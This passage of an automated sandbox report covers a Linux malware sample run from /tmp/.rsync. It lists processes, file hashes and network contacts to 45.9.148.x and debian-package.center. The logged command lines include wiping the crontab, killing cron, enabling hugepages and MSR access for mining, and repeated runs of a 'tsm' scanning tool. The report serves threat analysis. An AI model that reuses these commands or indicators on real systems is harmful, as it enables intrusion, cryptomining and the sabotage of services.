| US | 1.1.1.1:53 | debian-package.center | udp |
| US | 1.1.1.1:53 | debian-package.center | udp |
| NL | 45.9.148.129:80 | tcp | |
| NL | 45.9.148.125:80 | tcp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libnss_dns.so.2
[/tmp/.rsync/c/lib/32/libnss_dns.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:54
Platform
ubuntu2404-amd64-20240523-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/64/libdl.so.2
[/tmp/.rsync/c/lib/64/libdl.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/734/stat | /bin/ps | N/A |
| File opened for reading | /proc/735/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/352/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/149/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/151/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/733/stat | /bin/ps | N/A |
| File opened for reading | /proc/23/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/660/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/352/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/657/status | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/653/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/145/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/82/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/352/status | /bin/ps | N/A |
| File opened for reading | /proc/741/stat | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/657/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/72/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/685/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/status | /bin/ps | N/A |
| File opened for reading | /proc/719/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/685/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/685/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/707/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/117/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/374/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/659/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/status | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /sbin/sysctl | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/status | /bin/ps | N/A |
| File opened for reading | /proc/117/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/374/status | /bin/ps | N/A |
| File opened for reading | /proc/710/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/145/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/377/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/71/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/71/cmdline | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep AMD Ryzen]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240226-en
Max time kernel
4s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/387/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/103/stat | /bin/ps | N/A |
| File opened for reading | /proc/351/stat | /bin/ps | N/A |
| File opened for reading | /proc/730/status | /bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/724/stat | /bin/ps | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/351/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/stat | /bin/ps | N/A |
| File opened for reading | /proc/320/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/144/stat | /bin/ps | N/A |
| File opened for reading | /proc/225/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/726/stat | /bin/ps | N/A |
| File opened for reading | /proc/77/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/36/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/477/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/698/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/514/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/17/status | /bin/ps | N/A |
| File opened for reading | /proc/16/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/699/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/727/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/8/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/7/status | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /bin/ps | N/A |
| File opened for reading | /proc/684/stat | /bin/ps | N/A |
| File opened for reading | /proc/24/status | /bin/ps | N/A |
| File opened for reading | /proc/82/stat | /bin/ps | N/A |
| File opened for reading | /proc/144/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/514/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/725/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /bin/ps | N/A |
| File opened for reading | /proc/738/status | /bin/ps | N/A |
| File opened for reading | /proc/69/stat | /bin/ps | N/A |
| File opened for reading | /proc/514/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/699/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/730/stat | /bin/ps | N/A |
| File opened for reading | /proc/470/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/698/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/status | /bin/ps | N/A |
| File opened for reading | /proc/722/stat | /bin/ps | N/A |
| File opened for reading | /proc/510/stat | /bin/ps | N/A |
| File opened for reading | /proc/698/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/729/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
147s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
